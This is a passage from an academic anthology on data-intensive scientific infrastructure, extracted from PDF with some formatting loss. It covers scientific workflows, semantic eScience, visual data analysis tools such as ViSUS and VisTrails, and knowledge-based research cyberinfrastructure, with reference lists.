them. Consequently, scientists can use the best applications, not just the ones with which they are familiar. Multidisciplinary workflows promote even broader collaboration. In this sense, a workflow system is a framework for reusing a communitys tools and datasets that respects the original codes and overcomes diverse coding styles. Initiatives such as the BioCatalogue13 registry of life science Web services and the component registries deployed at SCEC enable components to be discovered. In addition to the benefits that come from explicit sharing, there is considerable value in the information that may be gathered just through monitoring the use of data sources, services, and methods. This enables automatic monitoring of resources and recommendation of common practice and optimization. Although the impact of workflow tools on data-centric research is potentially profoundscaling processing to match the scaling of datamany challenges exist over and above the engineering issues inherent in large-scale distributed software [14]. There are a confusing number of workflow platforms with various capabilities and purposes and little compliance with standards. Workflows are often difficult to author, using languages that are at an inappropriate level of abstraction and expecting too much knowledge of the underlying infrastructure. The reusability of a workflow is often confined to the project it was conceived inor even to its authorand it is inherently only as strong as its components. Although workflows encourage providers to supply clean, robust, and validated data services, component failure is common. If the services or infrastructure decays, so does the workflow. Unfortunately, debugging failing workflows is a crucial but neglected topic. Contemporary workflow platforms fall short of adequately supporting rapid deployment into the user applications that consume them, and legacy application codes need to be integrated and managed. 13 143 Conclusion Workflows affect data-centric research in four ways. First, they shift scientific practice. For example, in a data-driven hypothesis [1], data analysis yields results that are to be tested in the laboratory. Second, they have the potential to empower scientists to be the authors of their own sophisticated data processing pipelines without having to wait for software developers to produce the tools they need. Third, they offer systematic production of data that is comparable and verifiably attributable to its source. Finally, people speak of a data deluge [15], and datacentric science could be characterized as being about the primacy of data as opposed to the primacy of the academic paper or document [16], but it brings with it a method deluge: workflows illustrate primacy of method as another crucial paradigm in data-centric research. References [1] D. B. Kell and S. G. Oliver, Here is the evidence, now what is the hypothesis? The complementary roles of inductive and hypothesis-driven science in the post-genomic era, BioEssays, vol. 26, no. 1, pp. 99105, 2004, doi: 10.1002/bies.10385. [2] A. Halevy, P. Norvig, and F. Pereira, The Unreasonable Effectiveness of Data, IEEE Intell. Syst., vol. 24, no. 2, pp. 812. 2009, doi: 10.1109/MIS.2009.36. [3] C. Anderson, The End of Theory: The Data Deluge Makes the Scientific Method Obsolete, Wired, vol. 16, no. 7, June 23, 2008, pb_theory. [4] M. Y. Galperin and G. R. Cochrane, Nucleic Acids Research annual Database Issue and the NAR online Molecular Biology Database Collection in 2009, Nucl. Acids Res., vol. 37 (Database issue), pp. D1D4, doi: 10.1093/nar/gkn942. [5] C. Goble and R. Stevens, The State of the Nation in Data Integration in Bioinformatics, J. Biomed. Inform., vol. 41, no. 5, pp. 687693, 2008. [6] I. J. Taylor, E. Deelman, D. B. Gannon, and M. Shields, Eds., Workflows for e-Science: Scientific Workflows for Grids. London: Springer, 2007. [7] P. Romano, Automation of in-silico data analysis processes through workflow management systems, Brief Bioinform, vol. 9, no. 1, pp. 5768, Jan. 2008, doi: 10.1093/bib/bbm056. [8], no. 10, pp. 10671100, 2006, doi: 10.1002/cpe.v18:10. [9] E. Deelman, D. Gannon, M. Shields, and I. Taylor, Workflows and e-Science: An overview of workflow system features and capabilities, Future Gen. Comput. Syst., vol. 25, no. 5, pp. 528540, May 2009, doi: 10.1016/j.future.2008.06.012. [10] B. Wassermann, W. Emmerich, B. Butchart, N. Cameron, L. Chen, and J. Patel, Sedna: a BPELbased environment for visual scientific workflow modelling, in I. J. Taylor, E. Deelman, D. B. Gannon, and M. Shields, Eds., Workflows for e-Science: Scientific Workflows for Grids. London: Springer, 2007, pp. 428449, doi: 10.1.1.103.7892. [11] P. Fisher, C. Hedeler, K. Wolstencroft, H. Hulme, H. Noyes, S. Kemp, R. Stevens, and A. Brass, 144 SCIENTIFIC INFRASTRUCTURE [12] [13] [14] [15] [16] A Systematic Strategy for Large-Scale Analysis of Genotype-Phenotype Correlations: Identification of candidate genes involved in African Trypanosomiasis, Nucleic Acids Res., vol. 35, no. 16, pp. 56255633, 2007, doi: 10.1093/nar/gkm623. A. Goderis, U. Sattler, P. Lord, and C. Goble, Seven Bottlenecks to Workflow Reuse and Repurposing in The Semantic Web, ISWC 2005, pp. 323337, doi: 10.1007/11574620_25. D. De Roure, C. Goble, and R. Stevens, The Design and Realisation of the myExperiment Virtual Research Environment for Social Sharing of Workflows, Future Gen. Comput. Syst., vol. 25, pp. 561567, 2009, doi: 10.1016/j.future.2008.06.010. Y. Gil, E. Deelman, M. Ellisman, T. Fahringer, G. Fox, D. Gannon, C. Goble, M. Livny, L. Moreau, and J. Myers, Examining the Challenges of Scientific Workflows, Computer, vol. 40, pp. 2432, 2007, doi: 10.1109/MC.2007.421. G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 12971298, Mar. 6, 2009, doi: 10.1126/science.1170411. G. Erbach, Data-centric view in e-Science information systems, Data Sci. J., vol. 5, pp. 219222, 2006, doi: 10.2481/dsj.5.219. 145 s ci e n t i f i c i n f r a s t r u c t u r e yet traditional data technologies were not designed for the scale and heterogeneity of data in the modern world. Projects such as the Large Hadron Collider (LHC) and the Australian Square Kilometre Array Pathfinder (ASKAP) will generate petabytes of data that must be analyzed by hundreds of scientists working in multiple countries and speaking many different languages. The digital or electronic facilitation of science, or eScience [1], is now essential and becoming widespread. Clearly, data-intensive science, one component of eScience, must move beyond data warehouses and closed systems, striving instead to allow access to data to those outside the main project teams, allow for greater integration of sources, and provide interfaces to those who are expert scientists but not experts in data administration and computation. As eScience flourishes and the barriers to free and open access to data are being lowered, other, more challenging, questions are emerging, such as, How do I use this data that I did not generate? or How do I use this data type, which I have never seen, with the data I use every day? or What should I do if I really need data from another discipline but I cannot understand its terms? This list of questions is large and growing as data and information product use increases and as more of science comes to rely on specialized devices. 147 An important insight into dealing with heterogeneous data is that if you know what the data means, it will be easier to use. As the volume, complexity, and heterogeneity of data resources grow, scientists increasingly need new capabilities that rely on new semantic approaches (e.g., in the form of ontologiesmachine encodings of terms, concepts, and relations among them). Semantic technologies are gaining momentum in eScience areas such as solar-terrestrial physics (see Figure 1), ecology,1 ocean and marine sciences,2 healthcare, and life sciences,3 to name but a few. The developers of eScience infrastructures are increasingly in need of semantic-based methodologies, tools, and middleware. They can in turn facilitate scientific knowledge modeling, logic-based hypothesis checking, semantic data integration, application composition, and integrated knowledge discovery and data analysis for different scientific domains and systems noted above, for use by scientists, students, and, increasingly, non-experts. The influence of the artificial intelligence community and the increasing amount of data available on the Web (which has led many scientists to use the Web as their primary computer) have led semantic Web researchers to focus both on formal aspects of semantic representation languages and on general-purpose semantic application development. Languages are being standardized, and communities are in turn using those languages to build and use ontologiesspecifications of concepts and terms and the relations between them (in the formal, machine-readable sense). All of the capabilities currently needed by eScienceincluding data integration, fusion, and mining; workflow development, orchestration, and execution; capture of provenance, lineage, and data quality; validation, verification, and trust of data authenticity; and fitness for purposeneed semantic representation and mediation if eScience is to become fully data-intensive. The need for more semantics in eScience also arises in part from the increasingly distributed and interdisciplinary challenges of modern research. For example, the availability of high spatial-resolution remote sensing data (such as imagery) from satellites for ecosystem science is simultaneously changing the nature of research in other scientific fields, such as environmental science. Yet ground-truthing with in situ data creates an immediate data-integration challenge. Questions that arise for researchers who use such data include, How can point data be reconciled with various satellite datae.g., swath or griddedproducts? How is the spatial 1 E.g., the Science Environment for Ecological Knowledge (SEEK) and [2]. E.g., the Marine Metadata Interoperability (MMI) project. 3 E.g., the Semantic Web Health Care and Life Sciences (HCLS) Interest Group and [3]. 2 148 SCIENTIFIC INFRASTRUCTURE Figure 1. The Virtual Solar-Terrestrial Observatory (VSTO) provides data integration between physical parameters measured by different instruments. VSTO also mediates independent coordinate information to select appropriate plotting types using a semantic eScience approach without the user having to know the underlying representations and structure of the data [4, 5]. registration performed? Do these data represent the same thing, at the same vertical (as well as geographic) position or at the same time, and does that matter? Another scientist, such as a biologist, might need to access the same data from a very different perspective, to ask questions such as, I found this particular species in an unexpected location. What are the geophysical parameterstemperature, humidity, and so onfor this area, and how has it changed over the last weeks, months, years? Answers to such questions reside in both the metadata and the data itself. Perhaps more important is the fact that data and information products are increasingly being made available via Web services, so the semantic binding (i.e., the meaning) we seek must shift from being at the data level to being at the Internet/Web service level. Semantics adds not only well-defined and machine-encoded definitions of vo- 149 cabularies, concepts, and terms, but it also explains the interrelationships among them (and especially, on the Web, among different vocabularies residing in different documents or repositories) in declarative (stated) and conditional (e.g., rulebased or logic) forms. One of the present challenges around semantic eScience is balancing expressivity (of the semantic representation) with the complexity of defining terms used by scientific experts and implementing the resulting systems. This balance is application dependent, which means there is no one-approach-fitsall solution. In turn, this implies that a peer relationship is required between physical scientists and computer scientists, and between software engineers and data managers and data providers. The last few years have seen significant development in Web-based (i.e., XML) markup languages, including stabilization and standardization. Retrospective data and their accompanying catalogs are now provided as Web services, and real-time and near-real-time data are becoming standardized as sensor Web services are emerging. This means that diverse datasets are now widely available. Clearinghouses for such service registries, including the Earth Observing System Clearinghouse (ECHO) and the Global Earth Observation System of Systems (GEOSS) for Earth science, are becoming populated, and these complement comprehensive inventory catalogs such as NASAs Global Change Master Directory (GCMD). However, these registries remain largely limited to syntax-only representations of the services and underlying data. Intensive human effortto match inputs, outputs, and preconditions as well as the meaning of methods for the servicesis required to utilize them. Project and community work to develop data models to improve lower-level interoperability is also increasing. These models expose domain vocabularies, which is helpful for immediate domains of interest but not necessarily for crosscutting areas such as Earth science data records and collections. As noted in reports from the international level to the agency level, data from new missions, together with data from existing agency sources, are increasingly being used synergistically with other observing and modeling sources. As these data sources are made available as services, the need for interoperability among differing vocabularies, services, and method representations remains, and the limitations of syntax-only (or lightweight semantics, such as coverage) become clear. Further, as demand for information products (representations of the data beyond pure science use) increases, the need for non-specialist access to information services based on science data is rapidly increasing. This need is not being met in most application areas. Those involved in extant efforts (noted earlier, such as solar-terrestrial physics, 150 SCIENTIFIC INFRASTRUCTURE ecology, ocean and marine sciences, healthcare, and life sciences) have made the case for interoperability that moves away from reliance on agreements at the dataelement, or syntactic, level toward a higher scientific, or semantic, level. Results from such research projects have demonstrated these types of data integration capabilities in interdisciplinary and cross-instrument measurement use. Now that syntax-only interoperability is no longer state-of-the-art, the next logical step is to use the semantics to begin to enable a similar level of semantic support at the dataas-a-service level. Despite this increasing awareness of the importance of semantics to dataintensive eScience, participation from the scientific community to develop the particular requirements from specific science areas has been inadequate. Scientific researchers are growing ever more dependent on the Web for their data needs, but to date they have not yet created a coherent agenda for exploring the emerging trends being enabled by semantic technologies and for interacting with Semantic Web researchers. To help create such an agenda, we need to develop a multi-disciplinary field of semantic eScience that fosters the growth and development of data-intensive scientific applications based on semantic methodologies and technologies, as well as related knowledge-based approaches. To this end, we issue a four-point call to action: Researchers in science must work with colleagues in computer science and informatics to develop field-specific requirements and to implement and evaluate the languages, tools, and applications being developed for semantic eScience. Scientific and professional societies must provide the settings in which the needed rich interplay between science requirements and informatics capabilities can be realized, and they must acknowledge the importance of this work in career advancement via citation-like metrics. Funding agencies must increasingly target the building of communities of practice, with emphasis on the types of interdisciplinary teams of researchers and practitioners that are needed to advance and sustain semantic eScience efforts. All partiesscientists, societies, and fundersmust play a role in creating governance around controlled vocabularies, taxonomies, and ontologies that can be used in scientific applications to ensure the currency and evolution of knowledge encoded in semantics. 151 Although early efforts are under way in all four areas, much more must be done. The very nature of dealing with the increasing complexity of modern science demands it. References [1] T. Hey and A. E. Trefethen, Cyberinfrastructure for e-Science, Science, vol. 308, no. 5723, May 2005, pp. 817821, doi: 10.1126/science.1110410. [2] J. Madin, S. Bowers, M. Schildhauer, S. Krivov, D. Pennington, and F. Villa, An Ontology for Describing and Synthesizing Ecological Observation Data, Ecol. Inf., vol. 2, no. 3, pp. 279296, 2007, doi: 10.1016/j.ecoinf.2007.05.004. [3] E. Neumann, A Life Science Semantic Web: Are We There Yet? Sci. STKE, p. 22, 2005, doi: 10.1126/stke.2832005pe22. [4] P. Fox, D. McGuinness, L. Cinquini, P. West, J. Garcia, and J. Benedict, Ontology-supported scientific data frameworks: The virtual solar-terrestrial observatory experience, Comput. Geosci., vol. 35, no. 4, pp. 724738, 2009, doi: 10.1.1.141.1827. [5] D. McGuinness, P. Fox, L. Cinquini, P. West, J. Garcia, J. L. Benedict, and D. Middleton, The Virtual Solar-Terrestrial Observatory: A Deployed Semantic Web Application Case Study for Scientific Research, AI Mag., vol. 29, no. 1 , pp. 6576, 2007, doi: 10.1145/1317353.1317355. 152 SCIENTIFIC INFRASTRUCTURE s ci e n t i f i c i n f r a s t r u c t u r e Charles Hansen Chris R . Johnson Valerio Pascucci Claudio T. Silva University of Utah the world has experienced an information big bang: an explosion of data. The amount of information being created is increasing at an exponential rate. Since 2003, digital information has accounted for 90 percent of all information produced [1], vastly exceeding the amount of information on paper and on film. One of the greatest scientific and engineering challenges of the 21st century will be to understand and make effective use of this growing body of information. Visual data analysis, facilitated by interactive interfaces, enables the detection and validation of expected results while also enabling unexpected discoveries in science. It allows for the validation of new theoretical models, provides comparison between models and datasets, enables quantitative and qualitative querying, improves interpretation of data, and facilitates decision making. Scientists can use visual data analysis systems to explore what if scenarios, define hypotheses, and examine data using multiple perspectives and assumptions. They can identify connections among large numbers of attributes and quantitatively assess the reliability of hypotheses. In essence, visual data analysis is an integral part of scientific discovery and is far from a solved problem. Many avenues for future research remain open. In this article, we describe visual data analysis topics that will receive attention in the next decade [2, 3]. 153 gravitational force drives mixing perturbed interface heavy uid light uid t=0 Figure 1. t=200 t=400 t=700 Interactive visualization of four timesteps of the 11523 simulation of a Rayleigh-Taylor instability. Gravity drives the mixing of a heavy fluid on top of a lighter one. Two envelope surfaces capture the mixing region. In recent years, computational scientists with access to the worlds largest supercomputers have successfully simulated a number of natural and man-made phenomena with unprecedented levels of detail. Such simulations routinely produce massive amounts of data. For example, hydrodynamic instability simulations performed at Lawrence Livermore National Laboratory (LLNL) in early 2002 produced several tens of terabytes of data, as shown in Figure 1. This data must be visualized and analyzed to verify and validate the underlying model, understand the phenomenon in detail, and develop new insights into its fundamental physics. Therefore, both visualization and data analysis algorithms require new, advanced designs that enable high performance when dealing with large amounts of data. Data-streaming techniques and out-of-core computing specifically address the issues of algorithm redesign and data layout restructuring, which are necessary to enable scalable processing of massive amounts of data. For example, space-filling curves have been used to develop a static indexing scheme called ViSUS,1 which produces a data layout that enables the hierarchical traversal of ndimensional regular grids. Three features make this approach particularly attractive: (1) the order of the data is independent of the parameters of the physical hardware (a cache-oblivious approach), (2) conversion from Z-order used in classical database approaches is achieved using a simple sequence of bit-string manipulations, and (3) it does not introduce any data replication. This approach has 1 154 SCIENTIFIC INFRASTRUCTURE Figure 2. Scalability of the ViSUS infrastructure, which is used for visualization in a variety of applications (such as medical imaging, subsurface modeling, climate modeling, microscopy, satellite imaging, digital photography, and large-scale scientific simulations) and with a wide range of devices (from the iPhone to the powerwall). been used for direct streaming and real-time monitoring of large-scale simulations during execution [4]. Figure 2 shows the ViSUS streaming infrastructure streaming LLNL simulation codes and visualizing them in real time on the Blue Gene/L installation at the Supercomputing 2004 exhibit (where Blue Gene/L was introduced as the new fastest supercomputer in the world). The extreme scalability of this approach allows the use of the same code base for a large set of applications while exploiting a wide range of devices, from large powerwall displays to workstations, laptop computers, and handheld devices such as the iPhone. Generalization of this class of techniques to the case of unstructured meshes remains a major problem. More generally, the fast evolution and growing diversity of hardware pose a major challenge in the design of software infrastructures that are intrinsically scalable and adaptable to a variety of computing resources and running conditions. This poses theoretical and practical questions that future researchers in visualization and analysis for data-intensive applications will need to address. VisTrails: Provenance and Data Exploration Data exploration is an inherently creative process that requires the researcher to locate relevant data, visualize the data and discover relationships, collaborate with 155 peers while exploring solutions, and disseminate results. Given the volume of data and complexity of analyses that are common in scientific exploration, new tools are needed and existing tools should be extended to better support creativity. The ability to systematically capture provenance is a key requirement for these tools. The provenance (also referred to as the audit trail, lineage, or pedigree) of a data product contains information about the process and data used to derive the data product. The importance of keeping provenance for data products is well recognized in the scientific community [5, 6]. It provides important documentation that is key to preserving the data, determining its quality and authorship, and reproducing and validating the results. The availability of provenance also supports reflective reasoning, allowing users to store temporary results, make inferences from stored knowledge, and follow chains of reasoning backward and forward. VisTrails2 is an open source system that we designed to support exploratory computational tasks such as visualization, data mining, and integration. VisTrails provides a comprehensive provenance management infrastructure and can be easily combined with existing tools and libraries. A new concept we introduced with VisTrails is the notion of provenance of workflow evolution [7]. In contrast to previous workflow and visualization systems, which maintain provenance only for derived data products, VisTrails treats the workflows (or pipelines) as first-class data items and keeps their provenance. VisTrails is an extensible system. Like workflow systems, it allows pipelines to be created that combine multiple libraries. In addition, the VisTrails provenance infrastructure can be integrated with interactive tools, which cannot be easily wrapped in a workflow system [8]. Figure 3 shows an example of an exploratory visualization using VisTrails. In the center, the visual trail, or vistrail, captures all modifications that users apply to the visualizations. Each node in the vistrail tree corresponds to a pipeline, and the edges between two nodes correspond to changes applied to transform the parent pipeline into the child (e.g., through the addition of a module or a change to a parameter value). The tree-based representation allows a scientist to return to a previous version in an intuitive way, undo bad changes, compare workflows, and be reminded of the actions that led to a particular result. Ad hoc approaches to data exploration, which are widely used in the scientific community, have serious limitations. In particular, scientists and engineers need 2 156 SCIENTIFIC INFRASTRUCTURE Figure 3. An example of an exploratory visualization for studying celestial structures derived from cosmological simulations using VisTrails. Complete provenance of the exploration process is displayed as a vistrail. Detailed metadata are also stored, including free-text notes made by the scientist, the date and time the workflow was created or modified, optional descriptive tags, and the name of the person who created it. to expend substantial effort managing data (e.g., scripts that encode computational tasks, raw data, data products, images, and notes) and need to record provenance so that basic questions can be answered, such as: Who created the data product and when? When was it modified, and by whom? What process was used to create it? Were two data products derived from the same raw data? This process is not only time consuming but error prone. The absence of provenance makes it hard (and sometimes impossible) to reproduce and share results, solve problems collaboratively, validate results with different input data, understand the process used to solve a particular problem, and reuse the knowledge involved in the data analysis process. It also greatly limits the longevity of the data product. Without precise and sufficient information about how it was generated, its value is greatly diminished. Visualization systems aimed at the scientific domain need to provide a flexible 157 Figure 4. Representing provenance as a series of actions that modify a pipeline makes visualizing the differences between two workflows possible. The difference between two workflows is represented in a meaningful way, as an aggregation of the two. This is both informative and intuitive, reducing the time it takes to understand how two workflows are functionally different. framework that not only enables scientists to perform complex analyses over large datasets but also captures detailed provenance of the analysis process. Figure 4 shows ParaView3 (a data analysis and visualization tool for extreme3 158 SCIENTIFIC INFRASTRUCTURE ly large datasets) and the VisTrails Provenance Explorer transparently capturing a complete exploration process. The provenance capture mechanism was implemented by inserting monitoring code in ParaViews undo/redo mechanism, which captures changes to the underlying pipeline specification. Essentially, the action on top of the undo stack is added to the vistrail in the appropriate place, and undo is reinterpreted to mean move up the version tree. Note that the change-based representation is both simple and compactit uses substantially less space than the alternative approach of storing multiple instances, or versions, of the state. Flow Visualization Techniques A precise qualitative and quantitative assessment of three-dimensional transient flow phenomena is required in a broad range of scientific, engineering, and medical applications. Fortunately, in many cases the analysis of a 3-D vector field can be reduced to the investigation of the two-dimensional structures produced by its interaction with the boundary of the object under consideration. Typical examples of such analysis for fluid flows include airfoils and reactors in aeronautics, engine walls and exhaust pipes in the automotive industry, and rotor blades in turbomachinery. Other applications in biomedicine focus on the interplay between bioelectric fields and the surface of an organ. In each case, numerical simulations of increasing size and sophistication are becoming instrumental in helping scientists and engineers reach a deeper understanding of the flow properties that are relevant to their task. The scientific visualization community has concentrated a significant part of its research efforts on the design of visualization methods that convey local and global structures that occur at various spatial and temporal scales in transient flow simulations. In particular, emphasis has been placed on the interactivity of the corresponding visual analysis, which has been identified as a critical aspect of the effectiveness of the proposed algorithms. A recent trend in flow visualization research is to use GPUs to compute image space methods to tackle the computational complexity of visualization techniques that support flows defined over curved surfaces. The key feature of this approach is the ability to efficiently produce a dense texture representation of the flow without explicitly computing a surface parameterization. This is achieved by projecting onto the image plane the flow corresponding to the visible part of the surface, allowing subsequent texture generation in the image space through backward integration and iterative blending. Although the use of partial surface parameterization obtained by projection results in an impressive performance gain, texture patterns 159 Figure 5. Simulation of a high-speed ICE train. Left: The GPUFLIC result. Middle: Patch configurations. Right: Charts in texture space. stretching beyond the visible part of the self-occluded surface become incoherent due to the lack of full surface parameterization. To address this problem, we have introduced a novel scheme that fully supports the creation of high-quality texture-based visualizations of flows defined over arbitrary curved surfaces [9]. Called Flow Charts, our scheme addresses the issue mentioned previously by segmenting the surface into overlapping patches, which are then individually parameterized into charts and packed in the texture domain. The overlapped region provides each local chart with a smooth representation of its direct vicinity in the flow domain as well as with the inter-chart adjacency information, both of which are required for accurate and non-disrupted particle advection. The vector field and the patch adjacency relation are naturally represented as textures, enabling efficient GPU implementation of state-of-the-art flow texture synthesis algorithms such as GPUFLIC and UFAC. Figure 5 shows the result of a simulation of a high-speed German IntercityExpress (ICE) train traveling at a velocity of about 250 km/h with wind blowing from the side at an incidence angle of 30 degrees. The wind causes vortices to form on the lee side of the train, creating a drop in pressure that adversely affects the trains ability to stay on the track. These flow structures induce separation and attachment flow patterns on the train surface. They can be clearly seen in the proposed images close to the salient edges of the geometry. 160 SCIENTIFIC INFRASTRUCTURE Figure 6. Visualization of the Karman dataset using dye advection. Left column: Physically based dye advection. Middle column: Texture advection method. Right column: Level-set method. The time sequence is from top to bottom. The effectiveness of a physically based formulation can be seen with the Karman dataset (Figure 6), a numerical simulation of the classical Von Krmn vortex street phenomenon, in which a repeating pattern of swirling vortices is caused by the separation of flow passing over a circular-shaped obstacle. The visualization of dye advection is overlaid on dense texture visualization that shows instantaneous flow structures generated by GPUFLIC. The patterns generated by the texture-advection method are hazy due to numerical diffusion and loss of mass. In a level-set method, intricate structures are lost because of the binary dye/background threshold. Thanks to the physically based formulation [10], the visualization is capable of accurately conveying detailed structures not shown using the traditional texture-advection method. Future Data-Intensive Visualization Challenges Fundamental advances in visualization techniques and systems must be made to extract meaning from large and complex datasets derived from experiments and from upcoming petascale and exascale simulation systems. Effective data analysis and visualization tools in support of predictive simulations and scientific knowledge discovery must be based on strong algorithmic and mathematical foundations 161 and must allow scientists to reliably characterize salient features in their data. New mathematical methods in areas such as topology, high-order tensor analysis, and statistics will constitute the core of feature extraction and uncertainty modeling using formal definition of complex shapes, patterns, and space-time distributions. Topological methods are becoming increasingly important in the development of advanced data analysis because of their expressive power in describing complex shapes at multiple scales. The recent introduction of robust combinatorial techniques for topological analysis has enabled the use of topologynot only for presentation of known phenomena but for the detection and quantification of new features of fundamental scientific interest. Our current data-analysis capabilities lag far behind our ability to produce simulation data or record observational data. New visual data analysis techniques will need to dynamically consider high-dimensional probability distributions of quantities of interest. This will require new contributions from mathematics, probability, and statistics. The scaling of simulations to ever-finer granularity and timesteps brings new challenges in visualizing the data that is generated. It will be crucial to develop smart, semi-automated visualization algorithms and methodologies to help filter the data or present summary visualizations to enable scientists to begin analyzing the immense datasets using a more top-down methodological path. The ability to fully quantify uncertainty in high-performance computational simulations will provide new capabilities for verification and validation of simulation codes. Hence, uncertainty representation and quantification, uncertainty propagation, and uncertainty visualization techniques need to be developed to provide scientists with credible and verifiable visualizations. New approaches to visual data analysis and knowledge discovery are needed to enable researchers to gain insight into this emerging form of scientific data. Such approaches must take into account the multi-model nature of the data; provide the means for scientists to easily transition views from global to local model data; allow blending of traditional scientific visualization and information visualization; perform hypothesis testing, verification, and validation; and address the challenges posed by the use of vastly different grid types and by the various elements of the multi-model code. Tools that leverage semantic information and hide details of dataset formats will be critical to enabling visualization and analysis experts to concentrate on the design of these approaches rather than becoming mired in the trivialities of particular data representations [11]. 162 SCIENTIFIC INFRASTRUCTURE Acknowledgments Publication is based, in part, on work supported by DOE: VACET, DOE SDM, DOE C-SAFE Alliance Center, the National Science Foundation (grants IIS-0746500, CNS-0751152, IIS-0713637, OCE-0424602, IIS-0534628, CNS-0514485, IIS0513692, CNS-0524096, CCF-0401498, OISE-0405402, CNS-0615194, CNS0551724, CCF-0541113, IIS-0513212, and CCF-0528201), IBM Faculty Awards (2005, 2006, and 2007), NIH NCRR Grant No. 5P41RR012553-10 and Award Number KUS-C1-016-04, made by King Abdullah University of Science and Technology (KAUST). The authors would like to thank Juliana Freire and the VisTrails team for help with the third section of this article. References [1] C. R. Johnson, R. Moorhead, T. Munzner, H. Pfister, P. Rheingans, and T. S. Yoo, Eds., NIH-NSF Visualization Research Challenges Report, IEEE Press, ISBN 0-7695-2733-7, 2006, wpmu/techcom/national-initiatives/nihnsf-visualization-research-challenges-reportjanuary-2006, doi: 10.1109/MCG.2006.44. [2] NSF Blue Ribbon Panel Report on Simulation-Based Engineering Science (J. T. Oden, T. Belytschko, J. Fish, T. Hughes, C. R. Johnson, D. Keyes, A. Laub, L. Petzold, D. Srolovitz, and S. Yip), Simulation-Based Engineering Science, 2006, SBES_Final_Report.pdf. [3] NIH-NSF Visualization Research Challenges,. [4] V. Pascucci, D. E. Laney, R. J. Frank, F. Gygi, G. Scorzelli, L. Linsen, and B. Hamann, Real-time monitoring of large scientific simulations, SAC, pp. 194198, ACM, 2003, doi: 10.1.1.66.9717. [5] S. B. Davidson and J. Freire, Provenance and scientific workflows: challenges and opportunities, Proc. ACM SIGMOD, pp. 13451350, 2008, doi: 10.1.1.140.3264. [6] J. Freire, D. Koop, E. Santos, and C. Silva, Provenance for computational tasks: A survey, Comput. Sci. Eng, vol. 10, no. 3, pp. 1121, 2008, doi: 10.1109/MCSE.2008.79. [7] J. Freire, C. T. Silva, S. P. Callahan, E. Santos, C. E. Scheidegger, and H. T. Vo, Managing rapidly-evolving scientific workflows, International Provenance and Annotation Workshop (IPAW), LNCS 4145, pp. 1018, 2006, doi: 10.1.1.117.5530. [8] C. Silva, J. Freire, and S. P. Callahan, Provenance for visualizations: Reproducibility and beyond, IEEE Comput. Sci. Eng., 2007, doi: 10.1109/MCSE.2007.106. [9] G.-S. Li, X. Tricoche, D. Weiskopf, and C. Hansen, Flow charts: Visualization of vector fields on arbitrary surfaces, IEEE Trans. Visual. Comput. Graphics, vol. 14, no. 5, pp. 10671080, 2008, doi: 10.1109/TVCG.2008.58. [10] G.-S. Li, C. Hansen, and X. Tricoche, Physically-based dye advection for flow visualization. Comp. Graphics Forum J., vol. 27, no. 3, pp. 727735, 2008, doi: 10.1111/j.1467-8659.2008.01201.x. [11] Visualization and Knowledge Discovery: Report from the DOE/ASCR Workshop on Visual Analysis and Data Exploration at Extreme Scale, C. R. Johnson, R. Ross, S. Ahern, J. Ahrens, W. Bethel, K. L. Ma, M. Papka, J. van Rosendale, H. W. Shen, and J. Thomas,, 2007. 163 s ci e n t i f i c i n f r a s t r u c t u r e of the modern research environment, supporting all aspects of the research lifecycle [1]. The community uses the terms eScience and eResearch to highlight the important role of computer technology in the ways we undertake research, collaborate, share data and documents, submit funding applications, use devices to automatically and accurately collect data from experiments, deploy new generations of microscopes and telescopes to increase the quality of the acquired imagery, and archive everything along the way for provenance and long-term preservation [2, 3]. However, the same technological advances in data capture, generation, and sharing and the automation enabled by computers have resulted in an unprecedented explosion in dataa situation that applies not only to research but to every aspect of our digital lives. This data deluge, especially in the scientific domain, has brought new research infrastructure challenges, as highlighted by Jim Gray and Alex Szalay [4]. The processing, data transfer, and storage demands are far greater today than just a few years ago. It is no surprise that we are talking about the emergence of a new research methodologythe fourth paradigmin science. omputer systems have become a vital part 165 Through the use of technology and automation, we are trying to keep up with the challenges of the data deluge. The emergence of the Web as an application, data sharing, and collaboration platform has broken many barriers in the way research is undertaken and disseminated. The emerging cloud computing infrastructures (e.g., Amazons1) and the new generation of data-intensive computing platforms (e.g., DISC,2 Googles MapReduce,3 Hadoop,4 and Dryad5) are geared toward managing and processing large amounts of data. Amazon is even offering a sneakernet6-like service7 to address the problem of transferring large amounts of data into its cloud. Companies such as Google, Yahoo!, and Microsoft are demonstrating that it is possible to aggregate huge amounts of data from around the Web and store, manage, and index it and then build engaging user experiences around it. The primary focus of the current technologies addresses only the first part of the data-information-knowledge-wisdom spectrum.8 Computers have become efficient at storing, managing, indexing, and computing (research) data. They are even able to represent and process some of the information hidden behind the symbols used to encode that data. Nevertheless, we are still a long way from having computer systems that can automatically discover, acquire, organize, analyze, correlate, interpret, infer, and reason over information thats on the Internet, thats hidden on researchers hard drives, or that exists only in our brains. We do not yet have an infrastructure capable of managing and processing knowledge on a global scale, one that can act as the foundation for a generation of knowledge-driven services and applications. So, if the fourth paradigm is about data and information, it is not unreasonable to foresee a future, not far away, where we begin thinking about the challenges of managing knowledge and machine-based understanding on a very large scale. We researchers will probably be the first to face this challenge. 166 SCIENTIFIC INFRASTRUCTURE The work by the Semantic Web9 community has resulted in a number of technologies to help with data modeling, information representation, and the interexchange of semantics, always within the context of a particular application domain. Given the formal foundations of some of these technologies (e.g., the Web Ontology Language, or OWL), it has been possible to introduce reasoning capabilities, at least for some specific bounded domains (e.g., BioMoby10). Moving forward, the work of the Semantic Web community will continue to play a significant role in the interoperable exchange of information and knowledge. More importantly, as representation technologies such as RDF (Resource Description Framework), OWL, and microformats become widely accepted, the focus will transition to the computational aspects of semantic understanding and knowledge. The challenge we will face is the automation of the aggregation and combination of huge amounts of semantically rich information and, very crucially, the processes by which that information is generated and analyzed. Today, we must start thinking about the technologies well need in order to semantically describe, analyze, and combine the information and the algorithms used to produce it or consume it, and to do so on a global scale. If todays cloud computing services focus on offering a scalable platform for computing, tomorrows services will be built around the management of knowledge and reasoning over it. We are already seeing some attempts to infer knowledge based on the worlds information. Services such as OpenCyc,11 Freebase,12 Powerset,13 True Knowledge,14 and Wolfram|Alpha15 demonstrate how facts can be recorded in such a way that they can be combined and made available as answers to a users questions. Wolfram|Alpha, in particular, has made use of domain experts to encode the computational aspects of processing the data and information that they have aggregated from around the Web and annotated. It demonstrates how a consumer-oriented service can be built on top of a computational infrastructure in combination with natural language processing. It is likely that many similar services will emerge in the near future, initially targeting specialized technical/academic communities 9 167 and later expanding to all domains of interest. As with other service-oriented applications on the Web, the incorporation of computational knowledge services for scientists will be an important aspect of any research cyberinfrastructure. The myGrid16 